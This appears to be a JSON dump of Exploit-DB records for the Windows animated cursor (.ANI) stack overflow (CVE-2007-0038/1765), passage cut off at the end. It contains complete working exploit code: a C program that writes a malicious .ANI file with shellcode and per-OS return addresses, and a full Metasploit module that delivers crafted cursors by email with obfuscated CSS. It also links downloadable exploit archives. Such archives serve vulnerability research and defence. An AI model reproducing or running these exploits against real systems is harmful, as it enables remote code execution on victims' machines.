["CVE-2007-0038", "CVE-2007-1765"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "modified": "2007-04-01T00:00:00", "id": "EDB-ID:3634", "href": "https://www.exploit-db.com/exploits/3634/", "sourceData": "..::[ jamikazu presents ]::..\r\n\r\nWindows Animated Cursor Handling Exploit (0day)\r\n\r\nWorks on fully patched Windows Vista\r\nI think it is first real remote code execution exploit on vista =)\r\n\r\nTested on:\r\nWindows Vista Enterprise Version 6.0 (Build 6000) (default installation and UAC enabled)\r\nWindows Vista Ultimate Version 6.0 (Build 6000) (default installation and UAC enabled)\r\nWindows XP SP2 \r\n(It also must to work on all nt based windows but not tested)\r\n\r\nAuthor: jamikazu \r\nMail: jamikazu@gmail.com\r\n\r\nBug discovered by determina (http://www.determina.com)\r\n\r\nCredit: milw0rm,metasploit, SkyLined, http://doctus.net/\r\n\r\ninvokes calc.exe if successful \r\n\r\n\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/3634.zip (04012007-Animated_Cursor_Exploit.zip)\r\n\r\n# milw0rm.com [2007-04-01]\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/3634/"}, {"lastseen": "2016-01-31T18:55:24", "osvdbidlist": ["33629"], "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"], "references": [], "description": "MS Windows Animated Cursor (.ANI) Stack Overflow Exploit. CVE-2007-0038,CVE-2007-1765. Local exploit for windows platform", "reporter": "devcode", "published": "2007-03-31T00:00:00", "type": "exploitdb", "title": "Microsoft Windows - Animated Cursor .ANI Stack Overflow Exploit", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2007-0038", "CVE-2007-1765"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "modified": "2007-03-31T00:00:00", "id": "EDB-ID:3617", "href": "https://www.exploit-db.com/exploits/3617/", "sourceData": "/*\n* Copyright (c) 2007 devcode\n*\n*\n*\t\t\t^^ D E V C O D E ^^\n*\n* Windows .ANI LoadAniIcon Stack Overflow\n* [CVE-2007-1765]\n*\n*\n* Description:\n* A vulnerability has been identified in Microsoft Windows,\n*\t which could be exploited by remote attackers to take complete\n*\t control of an affected system. This issue is due to a stack overflow\n* error within the \"LoadAniIcon()\" [user32.dll] function when rendering\n* cursors, animated cursors or icons with a malformed header, which could\n*\t be exploited by remote attackers to execute arbitrary commands by\n* tricking a user into visiting a malicious web page or viewing an email\n* message containing a specially crafted ANI file.\n*\n* Hotfix/Patch:\n* None as of this time.\n*\n* Vulnerable systems:\n*\t Microsoft Windows 2000 Service Pack 4\n*\t Microsoft Windows XP Service Pack 2\n*\t Microsoft Windows XP 64-Bit Edition version 2003 (Itanium)\n*\t Microsoft Windows XP Professional x64 Edition\n*\t Microsoft Windows Server 2003\n*\t Microsoft Windows Server 2003 (Itanium)\n*\t Microsoft Windows Server 2003 Service Pack 1\n*\t Microsoft Windows Server 2003 Service Pack 1 (Itanium)\n*\t Microsoft Windows Server 2003 x64 Edition\n*\t Microsoft Windows Vista\n*\n*\t Microsoft Internet Explorer 6\n*\t Microsoft Internet Explorer 7\n*\n* This is a PoC and was created for educational purposes only. The\n*\t author is not held responsible if this PoC does not work or is\n*\t used for any other purposes than the one stated above.\n*\n* Notes:\n*\t For this to work on XP SP2 on explorer.exe, DEP has to be turned\n*\t off.\n*\n*/\n#include <iostream>\n#include <windows.h>\n\n/* ANI Header */\nunsigned char uszAniHeader[] =\n\"\\x52\\x49\\x46\\x46\\x00\\x04\\x00\\x00\\x41\\x43\\x4F\\x4E\\x61\\x6E\\x69\\x68\"\n\"\\x24\\x00\\x00\\x00\\x24\\x00\\x00\\x00\\xFF\\xFF\\x00\\x00\\x0A\\x00\\x00\\x00\"\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\"\\x10\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x54\\x53\\x49\\x4C\\x03\\x00\\x00\\x00\"\n\"\\x10\\x00\\x00\\x00\\x54\\x53\\x49\\x4C\\x03\\x00\\x00\\x00\\x02\\x02\\x02\\x02\"\n\"\\x61\\x6E\\x69\\x68\\xA8\\x03\\x00\\x00\";\n\n/* Shellcode - metasploit exec calc.exe ^^ */\nunsigned char uszShellcode[] =\n\"\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x49\\x49\\x49\\x49\\x49\\x49\"\n\"\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x37\\x49\\x49\\x49\\x49\\x51\\x5a\\x6a\\x42\"\n\"\\x58\\x50\\x30\\x41\\x31\\x42\\x41\\x6b\\x41\\x41\\x52\\x32\\x41\\x42\\x41\\x32\"\n\"\\x42\\x41\\x30\\x42\\x41\\x58\\x50\\x38\\x41\\x42\\x75\\x38\\x69\\x79\\x6c\\x4a\"\n\"\\x48\\x67\\x34\\x47\\x70\\x77\\x70\\x53\\x30\\x6e\\x6b\\x67\\x35\\x45\\x6c\\x4c\"\n\"\\x4b\\x73\\x4c\\x74\\x45\\x31\\x68\\x54\\x41\\x68\\x6f\\x6c\\x4b\\x70\\x4f\\x57\"\n\"\\x68\\x6e\\x6b\\x71\\x4f\\x45\\x70\\x65\\x51\\x5a\\x4b\\x67\\x39\\x4c\\x4b\\x50\"\n\"\\x34\\x4c\\x4b\\x77\\x71\\x68\\x6e\\x75\\x61\\x4b\\x70\\x4e\\x79\\x6e\\x4c\\x4d\"\n\"\\x54\\x4b\\x70\\x72\\x54\\x65\\x57\\x69\\x51\\x49\\x5a\\x46\\x6d\\x37\\x71\\x6f\"\n\"\\x32\\x4a\\x4b\\x58\\x74\\x77\\x4b\\x41\\x44\\x44\\x64\\x35\\x54\\x72\\x55\\x7a\"\n\"\\x45\\x6c\\x4b\\x53\\x6f\\x51\\x34\\x37\\x71\\x48\\x6b\\x51\\x76\\x4c\\x4b\\x76\"\n\"\\x6c\\x50\\x4b\\x6e\\x6b\\x71\\x4f\\x67\\x6c\\x37\\x71\\x68\\x6b\\x4c\\x4b\\x65\"\n\"\\x4c\\x4c\\x4b\\x64\\x41\\x58\\x6b\\x4b\\x39\\x53\\x6c\\x75\\x74\\x46\\x64\\x78\"\n\"\\x43\\x74\\x71\\x49\\x50\\x30\\x64\\x6e\\x6b\\x43\\x70\\x44\\x70\\x4c\\x45\\x4f\"\n\"\\x30\\x41\\x68\\x44\\x4c\\x4e\\x6b\\x63\\x70\\x44\\x4c\\x6e\\x6b\\x30\\x70\\x65\"\n\"\\x4c\\x4e\\x4d\\x6c\\x4b\\x30\\x68\\x75\\x58\\x7a\\x4b\\x35\\x59\\x4c\\x4b\\x4d\"\n\"\\x50\\x58\\x30\\x37\\x70\\x47\\x70\\x77\\x70\\x6c\\x4b\\x65\\x38\\x57\\x4c\\x31\"\n\"\\x4f\\x66\\x51\\x48\\x76\\x65\\x30\\x70\\x56\\x4d\\x59\\x4a\\x58\\x6e\\x63\\x69\"\n\"\\x50\\x31\\x6b\\x76\\x30\\x55\\x38\\x5a\\x50\\x4e\\x6a\\x36\\x64\\x63\\x6f\\x61\"\n\"\\x78\\x6a\\x38\\x4b\\x4e\\x6c\\x4a\\x54\\x4e\\x76\\x37\\x6b\\x4f\\x4b\\x57\\x70\"\n\"\\x63\\x51\\x71\\x32\\x4c\\x52\\x43\\x37\\x70\\x42\";\n\nchar szIntro[] =\n\"\\n\\t\\tWindows .ANI LoadAniIcon Stack Overflow\\n\"\n\"\\t\\t\\tdevcode (c) 2007\\n\"\n\"[+] Targets:\\n\"\n\"\\t(1) Windows XP SP2\\n\"\n\"\\t(2) Kernel32.dll (ExitProcess)\\n\"\n\"\\t(3) Windows 2K SP4\\n\\n\"\n\"Usage: ani.exe <target> <file>\";\n\ntypedef struct {\n\tconst char *szTarget;\n\tunsigned char uszRet[5];\n} TARGET;\n\nTARGET targets[] = {\n\t{ \"Windows XP SP2\", \"\\xC9\\x29\\xD4\\x77\" },\t\t\t\t/* call esp */\n\t{ \"Kernel32.dll (ExitProcess)\", \"\\x90\\x90\\x90\\x90\" },\t/* ExitProcess */\n\t{ \"Windows 2K SP4\", \"\\x29\\x4C\\xE1\\x77\" }\n};\n\nint main( int argc, char **argv ) {\n\tchar szBuffer[1024];\n\tFILE *f;\n\tvoid *pExitProcess[4];\n\n\tif ( argc < 3 ) {\n\t\tprintf(\"%s\\n\", szIntro );\n\t\treturn 0;\n\t}\n\n\tif ( atoi( argv[1] ) == 1 ) {\n\t\tprintf(\"[+] Getting ExitProcess address...\\n\");\n\t\t*pExitProcess = GetProcAddress( GetModuleHandle( \"kernel32.dll\" ), \n\"ExitProcess\" );\n\t\tif ( pExitProcess == NULL ) {\n\t\t\tprintf(\"[-] Cannot get ExitProcess address\\n\");\n\t\t\treturn 0;\n\t\t}\n\t\tmemcpy( targets[1].uszRet, pExitProcess, 4 );\n\t}\n\n\tprintf(\"[+] Creating ANI header...\\n\");\n\tmemset( szBuffer, 0x90, sizeof( szBuffer ) );\n\tmemcpy( szBuffer, uszAniHeader, sizeof( uszAniHeader ) - 1 );\n\n\tprintf(\"[+] Copying shellcode...\\n\");\n\tmemcpy( szBuffer + 168, targets[atoi( argv[1] )].uszRet, 4 );\n\tmemcpy( szBuffer + 192, uszShellcode, sizeof( uszShellcode ) - 1 );\n\n\tf = fopen( argv[2], \"wb\" );\n\tif ( f == NULL ) {\n\t\tprintf(\"[-] Cannot create file\\n\");\n\t\treturn 0;\n\t}\n\n\tfwrite( szBuffer, 1, 1024, f );\n\tfclose( f );\n\tprintf(\"[+] .ANI file succesfully created!\\n\");\n\treturn 0;\n}\n\n// milw0rm.com [2007-03-31]\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/3617/"}, {"lastseen": "2016-01-31T18:58:19", "osvdbidlist": ["33629"], "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"], "references": [], "description": "MS Windows XP Animated Cursor (.ANI) Remote Overflow Exploit 2. CVE-2007-0038,CVE-2007-1765. Remote exploit for windows platform", "reporter": "Trirat Puttaraksa", "published": "2007-04-01T00:00:00", "type": "exploitdb", "title": "Microsoft Windows XP - Animated Cursor .ANI Remote Overflow Exploit 2", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2007-0038", "CVE-2007-1765"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "modified": "2007-04-01T00:00:00", "id": "EDB-ID:3635", "href": "https://www.exploit-db.com/exploits/3635/", "sourceData": "Microsoft ANI Buffer Overflow Exploit\r\n\r\nAuthor: Trirat Puttaraksa\r\nhttp://sf-freedom.blogspot.com\r\n\r\nTested on: Windows XP SP2 fully patched + IE 6 SP2\r\n\r\nFor educational purpose only\r\n\r\nThere are many confuses about this vulnerability. Someone said that this could\r\nnot be exploited in XP SP2 - that's wrong. I provide this exploit because I \r\nwanna to tell these people that they are in danger. \r\nThis exploit will call calc.exe (shellcode fome metasploit win32_exec \r\nCMD=calc.exe EXITFUNC=process).\r\n\r\nP.S. I do not include the source code for generate the .ani file because of\r\nits damage. However, if you reverse engineer .ani file, you will know how\r\ncould I produce this exploit in 10 minutes.\r\n\r\nI will describe this vulnerability and how to exploit it in my blog \r\nafter M$ released patch.\r\n\r\ngreets: used SkyLined's idea of exploitation. tnx to him.\r\n\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/3635.zip (04012007-ani.zip)\r\n\r\n# milw0rm.com [2007-04-01]\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/3635/"}, {"lastseen": "2016-02-02T06:17:43", "osvdbidlist": ["33629"], "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"], "references": [], "description": "Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (SMTP). CVE-2007-0038,CVE-2007-1765. Remote exploit for windows platform", "reporter": "metasploit", "published": "2010-09-20T00:00:00", "type": "exploitdb", "title": "Windows ANI LoadAniIcon Chunk Size Stack Buffer Overflow SMTP", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2007-0038", "CVE-2007-1765"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "modified": "2010-09-20T00:00:00", "id": "EDB-ID:16698", "href": "https://www.exploit-db.com/exploits/16698/", "sourceData": "##\r\n# $Id: ms07_017_ani_loadimage_chunksize.rb 10394 2010-09-20 08:06:27Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\n\r\nrequire 'msf/core'\r\n\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GreatRanking\r\n\r\n\t#\r\n\t# This module sends email messages via smtp\r\n\t#\r\n\tinclude Msf::Exploit::Remote::SMTPDeliver\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (SMTP)',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\tThis module exploits a buffer overflow vulnerability in the\r\n\t\t\t\tLoadAniIcon() function of USER32.dll. The flaw is triggered\r\n\t\t\t\tthrough Outlook Express by using the CURSOR style sheet\r\n\t\t\t\tdirective to load a malicious .ANI file.\r\n\r\n\t\t\t\tThis vulnerability was discovered by Alexander Sotirov of Determina\r\n\t\t\t\tand was rediscovered, in the wild, by McAfee.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'hdm', # First version\r\n\t\t\t\t\t'skape', # Vista support\r\n\t\t\t\t],\r\n\t\t\t'Version' => '$Revision: 10394 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['MSB', 'MS07-017'],\r\n\t\t\t\t\t['CVE', '2007-0038'],\r\n\t\t\t\t\t['CVE', '2007-1765'],\r\n\t\t\t\t\t['OSVDB', '33629'],\r\n\t\t\t\t\t['BID', '23194'],\r\n\t\t\t\t\t['URL', 'http://www.microsoft.com/technet/security/advisory/935423.mspx'],\r\n\t\t\t\t\t['URL', 'http://www.determina.com/security_center/security_advisories/securityadvisory_0day_032907.asp'],\r\n\t\t\t\t\t['URL', 'http://www.determina.com/security.research/vulnerabilities/ani-header.html'],\r\n\t\t\t\t],\r\n\t\t\t'Stance' => Msf::Exploit::Stance::Passive,\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t# Cause internet explorer to exit after the code hits\r\n\t\t\t\t\t'EXITFUNC' => 'process',\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 1024 + (rand(1000)),\r\n\t\t\t\t\t'MinNops' => 32,\r\n\t\t\t\t\t'Compat' =>\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'ConnectionType' => '-bind -find',\r\n\t\t\t\t\t\t},\r\n\r\n\t\t\t\t\t'StackAdjustment' => -3500,\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# Use multiple cursor URLs to try all targets. This can result in\r\n\t\t\t\t\t# multiple, sequential sessions\r\n\t\t\t\t\t#\r\n\r\n\t\t\t\t\t[ 'Automatic', {} ],\r\n\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# The following targets use call [ebx+4], just like the original exploit\r\n\t\t\t\t\t#\r\n\r\n\t\t\t\t\t# Partial overwrite doesn't work for Outlook Express\r\n\t\t\t\t\t[ 'Windows XP SP2 user32.dll 5.1.2600.2622', { 'Ret' => 0x25ba, 'Len' => 2 }],\r\n\r\n\t\t\t\t\t# Should work for all English XP SP2\r\n\t\t\t\t\t[ 'Windows XP SP2 userenv.dll English', { 'Ret' => 0x769fc81a }],\r\n\r\n\t\t\t\t\t# Supplied by Fabrice MOURRON <fab[at]revhosts.net>\r\n\t\t\t\t\t[ 'Windows XP SP2 userenv.dll French', { 'Ret' => 0x7699c81a }],\r\n\r\n\t\t\t\t\t# Should work for English XP SP0/SP1\r\n\t\t\t\t\t[ 'Windows XP SP0/SP1 netui2.dll English', { 'Ret' => 0x71bd0205 }],\r\n\r\n\t\t\t\t\t# Should work for English 2000 SP0-SP4+\r\n\t\t\t\t\t[ 'Windows 2000 SP0-SP4 netui2.dll English', { 'Ret' => 0x75116d88 }],\r\n\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# Partial overwrite where 700b is a jmp dword [ebx] ebx points to the start\r\n\t\t\t\t\t# of the RIFF chunk itself. The length field of the RIFF chunk\r\n\t\t\t\t\t# tag contains a short jump into an embedded riff chunk that\r\n\t\t\t\t\t# makes a long relative jump into the actual payload.\r\n\t\t\t\t\t#\r\n\t\t\t\t\t[ 'Windows Vista user32.dll 6.0.6000.16386',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Ret' => 0x700b,\r\n\t\t\t\t\t\t\t'Len' => 2,\r\n\r\n\t\t\t\t\t\t\t# On Vista, the pages that contain the RIFF are read-only.\r\n\t\t\t\t\t\t\t# In-place decoders cannot be used.\r\n\t\t\t\t\t\t\t'Payload' => { 'EncoderType' => Msf::Encoder::Type::Raw }\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# Supplied by ramon[at]risesecurity.org\r\n\t\t\t\t\t#\r\n\r\n\t\t\t\t\t# call [ebx+4]\r\n\t\t\t\t\t[ 'Windows XP SP2 user32.dll (5.1.2600.2180) Multi Language', { 'Ret' => 0x25d0, 'Len' => 2 }],\r\n\t\t\t\t\t[ 'Windows XP SP2 user32.dll (5.1.2600.2180) English', { 'Ret' => 0x77d825d0 }],\r\n\t\t\t\t\t[ 'Windows XP SP2 userenv.dll Portuguese (Brazil)', { 'Ret' => 0x769dc81a }],\r\n\r\n\t\t\t\t\t# call [esi+4]\r\n\t\t\t\t\t[ 'Windows XP SP1a userenv.dll English', { 'Ret' => 0x75a758b1 }],\r\n\t\t\t\t\t[ 'Windows XP SP1a shell32.dll English', { 'Ret' => 0x77441a66 }]\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Mar 28 2007',\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\tend\r\n\r\n\tdef autofilter\r\n\t\tfalse\r\n\tend\r\n\r\n\tdef exploit\r\n\r\n\t\texts = ['bmp', 'wav', 'png', 'zip', 'tar']\r\n\r\n\t\tgext = exts[rand(exts.length)]\r\n\t\tname = rand_text_alpha(rand(10)+1) + \".#{gext}\"\r\n\r\n\t\tanis = {}\r\n\r\n\t\thtml =\r\n\t\t\t\"<html><head><title>\" +\r\n\t\t\t\trand_text_alphanumeric(rand(128)+4) +\r\n\t\t\t\"</title>\" +\r\n\t\t\t\"</head><body>\" + rand_text_alphanumeric(rand(128)+1)\r\n\r\n\r\n\t\tmytargs = (target.name =~ /Automatic/) ? targets : [target]\r\n\r\n\t\tif target.name =~ /Automatic/\r\n\t\t\ttargets.each_index { |i|\r\n\t\t\t\tnext if not targets[i].ret\r\n\t\t\t\tacid = generate_cid\r\n\t\t\t\thtml << generate_div(\"cid:#{acid}\")\r\n\r\n\t\t\t\t# Re-generate the payload, using the explicit target\r\n\t\t\t\treturn if ((p = regenerate_payload(nil, nil, targets[i])) == nil)\r\n\r\n\t\t\t\t# Generate an ANI file for this target\r\n\t\t\t\tanis[acid] = generate_ani(p, targets[i])\r\n\t\t\t}\r\n\t\telse\r\n\t\t\tacid = generate_cid\r\n\t\t\thtml << generate_div(\"cid:#{acid}\")\r\n\r\n\t\t\t# Re-generate the payload, using the explicit target\r\n\t\t\treturn if ((p = regenerate_payload(nil, nil, target)) == nil)\r\n\r\n\t\t\t# Generate an ANI file for this target\r\n\t\t\tanis[acid] = generate_ani(p, target)\r\n\t\tend\r\n\r\n\t\thtml << \"</body></html>\"\r\n\r\n\r\n\t\tmsg = Rex::MIME::Message.new\r\n\t\tmsg.mime_defaults\r\n\t\tmsg.subject = datastore['SUBJECT'] || Rex::Text.rand_text_alpha(rand(32)+1)\r\n\t\tmsg.to = datastore['MAILTO']\r\n\t\tmsg.from = datastore['MAILFROM']\r\n\r\n\t\tmsg.add_part(Rex::Text.encode_base64(html, \"\\r\\n\"), \"text/html\", \"base64\", \"inline\")\r\n\t\tanis.each_pair do |cid,ani|\r\n\t\t\tpart = msg.add_part_attachment(ani, cid + \".\" + gext)\r\n\t\t\tpart.header.set(\"Content-ID\", \"<\"+cid+\">\")\r\n\t\tend\r\n\r\n\t\tsend_message(msg.to_s)\r\n\r\n\t\tprint_status(\"Waiting for a payload session (backgrounding)...\")\r\n\tend\r\n\r\n\tdef generate_cid\r\n\t\trand_text_alphanumeric(32)+'@'+rand_text_alphanumeric(8)\r\n\tend\r\n\r\n\tdef generate_div(url)\r\n\t\t\"<div style='\" +\r\n\t\t\tgenerate_css_padding() +\r\n\t\t\tRex::Text.to_rand_case(\"cursor\") +\r\n\t\t\tgenerate_css_padding() +\r\n\t\t\t\":\" +\r\n\t\t\tgenerate_css_padding() +\r\n\t\t\tRex::Text.to_rand_case(\"url(\") +\r\n\t\t\tgenerate_css_padding() +\r\n\t\t\t\"\\\"#{url}\\\"\" +\r\n\t\t\tgenerate_css_padding() +\r\n\t\t\t\");\" +\r\n\t\t\tgenerate_css_padding() +\r\n\t\t\t\"'>\" +\r\n\t\t\tgenerate_padding() +\r\n\t\t\"</div>\"\r\n\tend\r\n\r\n\tdef generate_ani(payload, target)\r\n\r\n\t\t# Build the first ANI header\r\n\t\tanih_a = [\r\n\t\t\t36, # DWORD cbSizeof\r\n\t\t\trand(128)+16, # DWORD cFrames\r\n\t\t\trand(1024)+1, # DWORD cSteps\r\n\t\t\t0, # DWORD cx,cy (reserved - 0)\r\n\t\t\t0, # DWORD cBitCount, cPlanes (reserved - 0)\r\n\t\t\t0, 0, 0, # JIF jifRate\r\n\t\t\t1 # DWORD flags\r\n\t\t].pack('V9')\r\n\r\n\t\tanih_b = nil\r\n\r\n\t\tif (target.name =~ /Vista/)\r\n\t\t\t# Vista has ebp=80, eip=84\r\n\t\t\tanih_b = rand_text(84)\r\n\r\n\t\t\t# Patch local variables and loop counters\r\n\t\t\tanih_b[68, 12] = [0].pack(\"V\") * 3\r\n\t\telse\r\n\t\t\t# XP/2K has ebp=76 and eip=80\r\n\t\t\tanih_b = rand_text(80)\r\n\r\n\t\t\t# Patch local variables and loop counters\r\n\t\t\tanih_b[64, 12] = [0].pack(\"V\") * 3\r\n\t\tend\r\n\r\n\t\t# Overwrite the return with address of a \"call ptr [ebx+4]\"\r\n\t\tanih_b << [target.ret].pack('V')[0, target['Len'] ? target['Len'] : 4]\r\n\r\n\t\t# Begin the ANI chunk\r\n\t\triff = \"ACON\"\r\n\r\n\t\t# Calculate the data offset for the trampoline chunk and add\r\n\t\t# the trampoline chunk if we're attacking Vista\r\n\t\tif target.name =~ /Vista/\r\n\t\t\ttrampoline_doffset = riff.length + 8\r\n\r\n\t\t\triff << generate_trampoline_riff_chunk\r\n\t\tend\r\n\r\n\t\t# Insert random RIFF chunks\r\n\t\t0.upto(rand(128)+16) do |i|\r\n\t\t\triff << generate_riff_chunk()\r\n\t\tend\r\n\r\n\t\t# Embed the first ANI header\r\n\t\triff << \"anih\" + [anih_a.length].pack('V') + anih_a\r\n\r\n\t\t# Insert random RIFF chunks\r\n\t\t0.upto(rand(128)+16) do |i|\r\n\t\t\triff << generate_riff_chunk()\r\n\t\tend\r\n\r\n\t\t# Trigger the return address overwrite\r\n\t\triff << \"anih\" + [anih_b.length].pack('V') + anih_b\r\n\r\n\t\t# If this is a Vista target, then we need to align the length of the\r\n\t\t# RIFF chunk so that the low order two bytes are equal to a jmp $+0x16\r\n\t\tif target.name =~ /Vista/\r\n\t\t\tplen = (riff.length & 0xffff0000) | 0x0eeb\r\n\t\t\tplen += 0x10000 if (plen - 8) < riff.length\r\n\r\n\t\t\triff << generate_riff_chunk((plen - 8) - riff.length)\r\n\r\n\t\t\t# Replace the operand to the relative jump to point into the actual\r\n\t\t\t# payload itself which comes after the riff chunk\r\n\t\t\triff[trampoline_doffset + 1, 4] = [riff.length - trampoline_doffset - 5].pack('V')\r\n\t\tend\r\n\r\n\t\t# Place the RIFF chunk in front and off we go\r\n\t\tret = \"RIFF\" + [riff.length].pack('V') + riff\r\n\r\n\t\t# We copy the encoded payload to the stack because sometimes the RIFF\r\n\t\t# image is mapped in read-only pages. This would prevent in-place\r\n\t\t# decoders from working, and we can't have that.\r\n\t\tret << Rex::Arch::X86.copy_to_stack(payload.encoded.length)\r\n\r\n\t\t# Place the real payload right after it.\r\n\t\tret << payload.encoded\r\n\r\n\t\tret\r\n\r\n\tend\r\n\r\n\t# Generates a riff chunk with the first bytes of the data being a relative\r\n\t# jump. This is used to bounce to the actual payload\r\n\tdef generate_trampoline_riff_chunk\r\n\t\ttag = Rex::Text.to_rand_case(rand_text_alpha(4))\r\n\t\tdat = \"\\xe9\\xff\\xff\\xff\\xff\" + rand_text(1) + (rand_text(rand(256)+1) * 2)\r\n\t\ttag +\t[dat.length].pack('V') + dat\r\n\tend\r\n\r\n\tdef generate_riff_chunk(len = (rand(256)+1) * 2)\r\n\t\ttag = Rex::Text.to_rand_case(rand_text_alpha(4))\r\n\t\tdat = rand_text(len)\r\n\t\ttag + [dat.length].pack('V') + dat\r\n\tend\r\n\r\n\tdef generate_css_padding\r\n\t\tbuf =\r\n\t\t\tgenerate_whitespace() +\r\n\t\t\t\"/*\" +\r\n\t\t\tgenerate_whitespace() +\r\n\t\t\tgenerate_padding() +\r\n\t\t\tgenerate_whitespace() +\r\n\t\t\t\"*/\" +\r\n\t\t\tgenerate_whitespace()\r\n\tend\r\n\r\n\tdef generate_whitespace\r\n\t\tlen = rand(100)+2\r\n\t\tset = \"\\x09\\x20\\x0d\\x0a\"\r\n\t\tbuf = ''\r\n\r\n\t\twhile (buf.length < len)\r\n\t\t\tbuf << set[rand(set.length)].chr\r\n\t\tend\r\n\t\tbuf\r\n\tend\r\n\r\n\tdef generate_padding\r\n\t\trand_text_alphanumeric(rand(128)+4)\r\n\tend\r\n\r\nend\r\n\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16698/"}, {"lastseen": "2016-01-31T19:00:18", "osvdbidlist": ["33629"], "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"], "references": [], "description": "MS Windows Animated Cursor (.ANI) Overflow Exploit (Hardware DEP). CVE-2007-0038,CVE-2007-1765. Local exploit for windows platform", "reporter": "devcode", "published": "2007-04-03T00:00:00", "type": "exploitdb", "title": "Microsoft Windows - Animated Cursor .ANI Overflow Exploit Hardware DEP", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2007-0038", "CVE-2007-1765"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "modified": "2007-04-03T00:00:00", "id": "EDB-ID:3652", "href": "https://www.exploit-db.com/exploits/3652/", "sourceData": "/*\n* version 0.5\n* Copyright (c) 2007 devcode\n*\n*\n*\t\t\t^^ D E V C O D E ^^\n*\n* Windows .ANI LoadAniIcon Stack Overflow For Hardware DEP XP SP2\n* [CVE-2007-1765]\n*\n*\n* Description:\n* A vulnerability has been identified in Microsoft Windows,\n* which could be exploited by remote attackers to take complete\n* control of an affected system. This issue is due to a stack overflow\n* error within the \"LoadAniIcon()\" [user32.dll] function when rendering\n* cursors, animated cursors or icons with a malformed header, which could\n* be exploited by remote attackers to execute arbitrary commands by\n* tricking a user into visiting a malicious web page or viewing an email\n* message containing a specially crafted ANI file.\n*\n* Hotfix/Patch:\n* None as of this time.\n*\n* Vulnerable systems:\n*\t Microsoft Windows 2000 Service Pack 4\n*\t Microsoft Windows XP Service Pack 2\n*\t Microsoft Windows XP 64-Bit Edition version 2003 (Itanium)\n*\t Microsoft Windows XP Professional x64 Edition\n*\t Microsoft Windows Server 2003\n*\t Microsoft Windows Server 2003 (Itanium)\n*\t Microsoft Windows Server 2003 Service Pack 1\n*\t Microsoft Windows Server 2003 Service Pack 1 (Itanium)\n*\t Microsoft Windows Server 2003 x64 Edition\n*\t Microsoft Windows Vista\n*\n*\t Microsoft Internet Explorer 6\n*\t Microsoft Internet Explorer 7\n*\n* Tested on:\n* \t Microsoft XP SP2 + DEP + Internet Explorer 6\n*\n* This is a PoC and was created for educational purposes only. The\n* author is not held responsible if this PoC does not work or is\n* used for any other purposes than the one stated above.\n*\n*\tCredit goes to HOD (if he/they exist :P) for the html. Works on\n* XP SP2 with Hardware DEP enabled, go figure.\n*\n* ^^ shoutz to Wonk(if he exists r0fl), InTeL, thrasher :)\n*\n*\n*/\n#include <iostream>\n#include 